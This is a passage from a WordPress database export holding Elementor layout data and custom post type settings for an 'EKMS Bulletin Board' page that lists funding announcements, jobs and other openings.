elements\":[{\"id\":\"106c13c\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"institution\",\"post_ids\":\"696,663,680,93,684,95,620,635,626,630,614,673,677,621,669,690,652,659\",\"title_trimmed_ending_text\":\"...\",\"show_excerpt\":\"\",\"excerpt_length\":\"\",\"show_terms_tax\":\"institutions_category\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"d6ea351\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"7f993f7\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"box_bg\":\"rgba(0,100,0,0.74)\",\"box_border_border\":\"solid\",\"box_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"box_border_color\":\"#61ce70\",\"box_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_color_hover\":\"#014421\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"title_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"title_margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"show_terms\":\"yes\",\"slides_to_scroll\":\"4\",\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"terms_link_typography_font_weight\":\"400\",\"terms_link_bg_color\":\"rgba(110,193,228,0.72)\",\"terms_link_color\":\"#000000\",\"terms_link_hover_bg_color\":\"#006400\",\"terms_link_hover_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17e934c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"3d6400c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"baf14d9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(16452,2483,'_elementor_controls_usage','a:0:{}'),(16453,2483,'label_singular','EKMS Bulletin'),(16454,2483,'public','1'),(16455,2483,'show_ui','1'),(16456,2483,'supports_title','1'),(16457,2483,'supports_editor','1'),(16458,2483,'type','post_type'),(16459,2483,'storage','meta'),(16460,2483,'old_name','ekms_bulletin'),(16461,2483,'publicly_queryable','1'),(16462,2483,'exclude_from_search','0'),(16463,2483,'capability_type','post'),(16464,2483,'capability_type_custom','ekms_bulletin'),(16465,2483,'capability_type_extra','1'),(16466,2483,'has_archive','1'),(16467,2483,'hierarchical','0'),(16468,2483,'rewrite','1'),(16469,2483,'rewrite_with_front','1'),(16470,2483,'rewrite_feeds','0'),(16471,2483,'rewrite_pages','1'),(16472,2483,'query_var','1'),(16473,2483,'can_export','1'),(16474,2483,'default_status','draft'),(16475,2483,'supports_author','0'),(16476,2483,'supports_thumbnail','0'),(16477,2483,'supports_excerpt','0'),(16478,2483,'supports_trackbacks','0'),(16479,2483,'supports_custom_fields','0'),(16480,2483,'supports_comments','0'),(16481,2483,'supports_revisions','0'),(16482,2483,'supports_page_attributes','0'),(16483,2483,'supports_post_formats','0'),(16484,2483,'built_in_taxonomies_category','0'),(16485,2483,'built_in_taxonomies_elementor_library_category','0'),(16486,2483,'built_in_taxonomies_elementor_library_type','0'),(16487,2483,'built_in_taxonomies_institutions_category','0'),(16488,2483,'built_in_taxonomies_link_category','0'),(16489,2483,'built_in_taxonomies_post_tag','0'),(16490,2483,'built_in_taxonomies_resource_category','0'),(16491,2483,'built_in_taxonomies_resource_tag','0'),(16492,2483,'built_in_taxonomies_resource_type','0'),(16493,2483,'show_in_menu','1'),(16494,2483,'menu_position','0'),(16495,2483,'show_in_nav_menus','1'),(16496,2483,'show_in_admin_bar','1'),(16497,2483,'pfat_enable','0'),(16498,2483,'pfat_run_outside_loop','0'),(16500,2483,'pfat_append_single','append'),(16501,2483,'pfat_filter_single','the_content'),(16502,2483,'pfat_append_archive','append'),(16503,2483,'pfat_filter_archive','custom'),(16504,2483,'rest_enable','0'),(16505,2483,'read_all','0'),(16506,2483,'write_all','0'),(16507,2453,'built_in_post_types_ekms_bulletin','0'),(16508,412,'built_in_post_types_ekms_bulletin','0'),(16509,413,'built_in_post_types_ekms_bulletin','0'),(16510,465,'built_in_post_types_ekms_bulletin','0'),(16511,2483,'menu_icon','dashicons-pressthis'),(16512,72,'ocean_post_layout','full-width'),(16513,72,'osh_disable_topbar_sticky','default'),(16514,72,'osh_disable_header_sticky','default'),(16515,72,'osh_sticky_header_style','default'),(16516,72,'_elementor_edit_mode','builder'),(16517,72,'_elementor_template_type','wp-page'),(16518,72,'_elementor_version','3.4.0'),(16525,72,'_wp_page_template','default'),(16526,72,'_elementor_data','[{\"id\":\"54b7556\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df75915\"}]},\"elements\":[{\"id\":\"b473d47\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f2c7e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"You are on the EKMS Bulletin Board:\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2079558\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This bulletin provides a space for funding announcements, jobs, and other related openings.\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cb8563c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e7317f1\"}]},\"elements\":[{\"id\":\"007d245\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0a3f9d5\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"500791b\"}],\"structure\":\"30\",\"motion_fx_devices\":[\"desktop\"]},\"elements\":[{\"id\":\"bb6259c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":57.72399999999999664623828721232712268829345703125},\"elements\":[{\"id\":\"3ade5ef\",\"elType\":\"widget\",\"settings\":{\"title\":\"Announcements\\/Vacancies\",\"header_size\":\"h4\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_text_decoration\":\"underline\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true},{\"id\":\"087a2ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":20.28999999999999914734871708787977695465087890625},\"elements\":[{\"id\":\"4638ad1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Posted\",\"header_size\":\"h4\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_text_decoration\":\"underline\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true},{\"id\":\"c515565\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":21.010999999999999232613845379091799259185791015625},\"elements\":[{\"id\":\"ecf2102\",\"elType\":\"widget\",\"settings\":{\"title\":\"Closed\",\"header_size\":\"h4\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_text_decoration\":\"underline\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"2301b1e\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"f713c51\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"ekms_bulletin\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"4096\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_columns\":\"1\",\"custom_posts_per_page\":10,\"custom_column_gap\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]},\"pagination_type\":\"numbers_and_prev_next\",\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":75,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"4f69fff\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false}]'),(16527,2486,'_elementor_controls_usage','a:0:{}'),(16528,2486,'_elementor_edit_mode','builder'),(16529,2486,'_elementor_template_type','wp-page'),(16530,2486,'_elementor_version','2.7.5'),(16531,2486,'_wp_page_template','default'),(16532,2486,'_elementor_data','[{\"id\":\"54b7556\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df75915\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"b473d47\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f2c7e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"You are on the EKMS Bulletin Board:\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(16539,2488,'_elementor_edit_mode','builder'),(16540,2488,'_elementor_template_type','wp-page'),(16541,2488,'_elementor_version','2.7.5'),(16542,2488,'_wp_page_template','default'),(16543,2488,'_elementor_data','[{\"id\":\"54b7556\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df75915\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"b473d47\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f2c7e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"You are on the EKMS Bulletin Board:\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2079558\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Here you can search the bulletins for funding announcements, jobs, and other related openings.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(16545,2489,'_elementor_edit_mode','builder'),(16546,2489,'_elementor_template_type','wp-page'),(16547,2489,'_elementor_version','2.7.5'),(16548,2489,'_wp_page_template','default'),(16549,2489,'_elementor_data','[{\"id\":\"54b7556\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df75915\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"b473d47\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f2c7e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"You are on the EKMS Bulletin Board:\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2079558\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Here you can search the bulletins for funding announcements, jobs, and other related openings.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"054d4e8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0991156\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"4f39c88\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5b49b03\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_rows\":\"6\",\"show_image\":\"\",\"excerpt_trimmed_ending\":\"...\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"post_type\":\"ekms_bulletin\",\"all_btn_label\":\"All\",\"show_arrows\":\"yes\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c73414a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"0baf480\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}]},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false}]'),(16561,2492,'_elementor_edit_mode','builder'),(16562,2492,'_elementor_template_type','wp-page'),(16563,2492,'_elementor_version','2.7.5'),(16564,2492,'_wp_page_template','default'),(16565,2492,'_elementor_data','[{\"id\":\"54b7556\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df75915\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"b473d47\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f2c7e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"You are on the EKMS Bulletin Board:\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2079558\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>This bulletin provides a space for funding announcements, jobs, and other related openings.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"054d4e8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0991156\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"4f39c88\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5b49b03\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_rows\":\"6\",\"show_image\":\"\",\"excerpt_trimmed_ending\":\"...\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"post_type\":\"ekms_bulletin\",\"all_btn_label\":\"All\",\"show_arrows\":\"yes\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c73414a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"0baf480\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#6ec1e4\",\"post_title_color_hover\":\"#006400\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false}]'),(16568,2493,'_elementor_edit_mode','builder'),(16569,2493,'_elementor_template_type','wp-page'),(16570,2493,'_elementor_version','2.7.5'),(16571,2493,'_wp_page_template','default'),(16572,2493,'_elementor_data','[{\"id\":\"54b7556\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df75915\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"b473d47\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f2c7e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"You are on the EKMS Bulletin Board:\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2079558\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>This bulletin provides a space for funding announcements, jobs, and other related openings.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"054d4e8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0991156\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"4f39c88\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5b49b03\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_rows\":\"6\",\"show_image\":\"\",\"excerpt_trimmed_ending\":\"...\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"post_type\":\"ekms_bulletin\",\"all_btn_label\":\"All\",\"show_arrows\":\"yes\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c73414a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"0baf480\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#6ec1e4\",\"post_title_color_hover\":\"#006400\",\"post_text_color\":\"rgba(122,122,122,0.59)\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false}]'),(16574,2494,'_elementor_edit_mode','builder'),(16575,2494,'_elementor_template_type','wp-page'),(16576,2494,'_elementor_version','2.7.5'),(16577,2494,'_wp_page_template','default'),(16578,2494,'_elementor_data','[{\"id\":\"54b7556\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df75915\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"b473d47\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f2c7e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"You are on the EKMS Bulletin Board:\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2079558\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>This bulletin provides a space for funding announcements, jobs, and other related openings.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"054d4e8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0991156\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"4f39c88\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5b49b03\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_rows\":\"6\",\"show_image\":\"\",\"excerpt_trimmed_ending\":\"...\",\"read_more_text\":\"Read More\",\"post_type\":\"ekms_bulletin\",\"all_btn_label\":\"All\",\"show_arrows\":\"yes\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c73414a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"0baf480\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, 